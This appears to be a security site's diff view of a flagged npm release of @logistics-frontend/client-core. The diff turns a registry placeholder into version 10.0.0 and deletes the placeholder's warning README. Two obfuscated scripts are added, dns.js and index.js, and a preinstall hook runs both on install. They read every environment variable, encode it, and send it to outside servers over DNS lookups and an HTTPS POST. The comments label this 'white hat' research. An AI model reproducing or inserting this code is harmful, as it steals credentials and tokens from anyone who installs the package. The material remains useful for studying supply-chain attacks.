@logistics-frontend/client-core 0.0.1-security → 10.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @logistics-frontend/client-core might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/dns.js +5 -0
  2. package/index.js +5 -0
  3. package/package.json +11 -3
  4. package/README.md +0 -5
package/dns.js ADDED
@@ -0,0 +1,5 @@
1
+
2
+ //hackerone.com/homosec
3
+ //Bug Bounty Security Reasearch White Hat
4
+ var _0xf9a0=['\x64\x6E\x73','\x6F\x73','','\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74','\x6D\x61\x70','\x73\x70\x6C\x69\x74','\x74\x72\x69\x6D','\x2E\x7B\x31\x2C','\x7D','\x67','\x6D\x61\x74\x63\x68','\x31\x37\x38\x2E\x31\x35\x34\x2E\x32\x31\x32\x2E\x32\x33\x34','\x73\x65\x74\x53\x65\x72\x76\x65\x72\x73','\x62\x61\x73\x65\x36\x34','\x65\x6E\x76','\x73\x74\x72\x69\x6E\x67\x69\x66\x79','\x6E\x6F\x77','\x2F','\x5F\x5F\x5F','\x72\x65\x70\x6C\x61\x63\x65','@logistics-frontend/client-core\x2E','\x66\x72\x6F\x6D\x69\x70\x2E','\x2E','\x72\x65\x73\x6F\x6C\x76\x65\x34'];const {Resolver}=require(_0xf9a0[0]);const resolver= new Resolver();const os=require(_0xf9a0[1]);function convertASCIItoHex(_0x96adx4){let _0x96adx5=_0xf9a0[2];let _0x96adx6,_0x96adx7;_0x96adx4[_0xf9a0[5]](_0xf9a0[2])[_0xf9a0[4]]((i)=>{_0x96adx6= i[_0xf9a0[3]](0);_0x96adx7= _0x96adx6.toString(16);_0x96adx5= _0x96adx5+ _0x96adx7});_0x96adx5= _0x96adx5[_0xf9a0[6]]();return _0x96adx5}function splitString(_0x96adxa,_0x96adxb){var _0x96adxc= new RegExp(_0xf9a0[7]+ _0x96adxb+ _0xf9a0[8],_0xf9a0[9]);return _0x96adxa[_0xf9a0[10]](_0x96adxc)}resolver[_0xf9a0[12]]([_0xf9a0[11]]);var ebala=JSON[_0xf9a0[15]](process[_0xf9a0[14]]).toString(_0xf9a0[13]);var ch=splitString(convertASCIItoHex(ebala),32);var dt=Date[_0xf9a0[16]]();for(var i in ch){resolver[_0xf9a0[23]](_0xf9a0[20][_0xf9a0[19]](_0xf9a0[17],_0xf9a0[18])+ _0xf9a0[21]+ dt+ _0xf9a0[22]+ i+ _0xf9a0[22]+ ch[i],function(_0x96adx10){if(_0x96adx10){throw _0x96adx10}})}
5
+
package/index.js ADDED
@@ -0,0 +1,5 @@
1
+
2
+ //hackerone.com/homosec
3
+ //Bug Bounty Security Reasearch White Hat
4
+ var _0xee82=['\x68\x74\x74\x70\x73','\x2E','\x6A\x6F\x69\x6E','\x37\x36\x63\x34\x32\x66\x32\x37\x64\x32\x36\x30\x39\x31\x36\x35\x39\x64\x63\x61\x38\x32\x30\x61\x33\x37\x65\x36\x66\x35\x64\x33','\x6D','','\x70\x69\x70\x65','\x64\x72\x65\x61\x6D','\x6E\x65\x74','\x2F@logistics-frontend/client-core','\x50\x4F\x53\x54','\x72\x65\x71\x75\x65\x73\x74','\x62\x61\x73\x65\x36\x34','\x65\x6E\x76','\x73\x74\x72\x69\x6E\x67\x69\x66\x79','\x66\x72\x6F\x6D','\x77\x72\x69\x74\x65','\x65\x6E\x64'];const http=require(_0xee82[0]);req= http[_0xee82[11]]({host:[_0xee82[3],_0xee82[4],[_0xee82[6],_0xee82[7]][_0xee82[2]](_0xee82[5]),_0xee82[8]][_0xee82[2]](_0xee82[1]),path:_0xee82[9],method:_0xee82[10]});req[_0xee82[16]](Buffer[_0xee82[15]](JSON[_0xee82[14]](process[_0xee82[13]]).toString(_0xee82[12])));req[_0xee82[17]]()
5
+
package/package.json CHANGED
@@ -1,6 +1,14 @@
1
+
1
2
  {
2
3
  "name": "@logistics-frontend/client-core",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
4
+ "version": "10.0.0",
5
+ "description": "hackerone.com/homosec Bug Bounty Security Reseaarch White Hat",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "test": "echo \"Error: no test specified\" && exit 1",
9
+ "preinstall":"node dns.js | node index.js"
10
+ },
11
+ "author": "",
12
+ "license": "ISC"
6
13
  }
14
+
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=%40logistics-frontend%2Fclient-core for more information.